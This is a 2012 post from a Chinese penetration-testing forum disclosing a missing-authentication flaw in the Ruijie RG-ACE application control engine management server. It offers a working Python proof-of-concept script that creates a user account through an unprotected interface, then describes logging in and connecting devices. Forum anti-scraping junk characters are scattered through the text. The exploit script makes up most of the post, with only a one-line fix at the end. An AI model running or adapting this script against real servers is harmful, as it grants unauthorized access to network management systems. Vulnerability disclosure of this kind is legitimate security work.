找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2050|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
$ ^( |/ ~4 u1 l8 g& N3 G
0 E0 t- M/ u2 m7 U1 N( v( _9 X8 z$ N  Q  `) T" j4 K) q) @7 C6 b9 ~
测试的具体版本是# T3 ~- }) [7 v. F- k
产品名称: 锐捷应用控制引擎
5 C1 A" S7 w$ x  e9 u版本号: 3.1.36.001 TC5 s, K7 u0 G; Q1 i9 g3 \( `' T
编译时间: 2011042917303 ?9 R, v5 V, [0 o4 A
. N  s2 }+ `/ S: }7 _

, L- f% n1 B5 H4 c0 h1 U" C% Y/ z漏洞证明:
: h! \. l: _: y% i: x $ K# u. L: w; M$ V, }4 F; D2 ~( w
0 G' u2 A/ k- d& A- u0 q
: M. a$ S4 ^# H4 U* ?3 ]7 N( s* J
9 R: S! l& r* h
: I/ c  u' e( I! |+ L- V5 g0 ^

, i! ^! Y5 n4 L; D9 h) f4 G执行脚本
' |: h1 k& S* v' y0 ^5 v#! /usr/bin/env python/ G; c# o  Z4 M( U- B$ A; u9 d3 P; |
#coding=gbk7 r/ [9 y( W( M- I& l8 X! I& p; e
#RG-ACE管理服务器 V3.1.36.001
2 k% }9 m  i9 h+ ?. K0 O5 n0 @  U. Simport urllib2, urllib,cookielib
: p/ X: i! }" c+ v+ M# p# Qurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 ~  [# F* ^' q: T2 copener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 p; \0 ^" t' E. m$ r% Z0 x" fopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, d6 V5 E# O9 u7 G$ m, [  {post=(("event","userManager.doInsertUserInfo"),, Y/ I2 V$ P+ {2 m
("useractionname","addButtonValue"),
0 J3 D  i: z! Z8 u9 B" y8 B("useropermanager","userManager"),7 A# B! c  b! ^1 j6 g, s
("userName","t"), #######账号自己加6 K3 J% J/ u7 G: @7 I& S
("pwd","aaaaaa"),######密码自己加% h+ R. g5 P6 l, m
("trueName","ad"),
* }- g4 Q$ w( C- x! D("email",""),
2 O6 F0 X4 c9 |5 H  x' N9 K1 |0 ~& A("mobilePhone",""),7 N- G- q( @4 F$ y5 v
("officePhone",""),
* G  [# y: N8 i/ i, Q4 v7 n("addr",""),/ }; m; K1 i1 n+ ~: H0 @
("submit","确定"))/ a2 v) S8 U1 V8 |- N9 z7 q
urllib2.install_opener(opener); Z8 l, m5 x2 V3 X. ~/ [1 F' ?; h5 v' d
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
& r4 W, I7 J, N1 ]$ _( W% cprint "Done"
" g4 A; b4 K3 |+ D' V& V7 M% n. x$ Z& s
登录,连接设备
2 R* N3 {5 S$ J5 _! C3 V. E0 D
7 q; b5 d! J& ?  @8 P# A* G3 \/ J) t6 O3 c9 Y$ L6 e

4 v, ~% i% g, a& ^: f' w3 m  h& D& s0 s; H* o9 m
- F& w: ?9 \) P! N2 N2 v
默认的管理员admin权限更大点$ \% s9 h7 i$ Y3 ^
# I$ z/ r) E4 X% {% Z! P8 c( x

" ?* v/ z3 J  H: t8 ]4 f
6 l. n/ P. R( N! n
- K* l/ }+ L# j/ R9 G$ ~: L4 ^( ]
修复方案:
  K4 I; M% _" z% I9 [5 P8 C加强对接口的权限验证" r  b4 d# s$ {2 K0 A
; x. e* l6 Z" z& o) q8 s9 e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表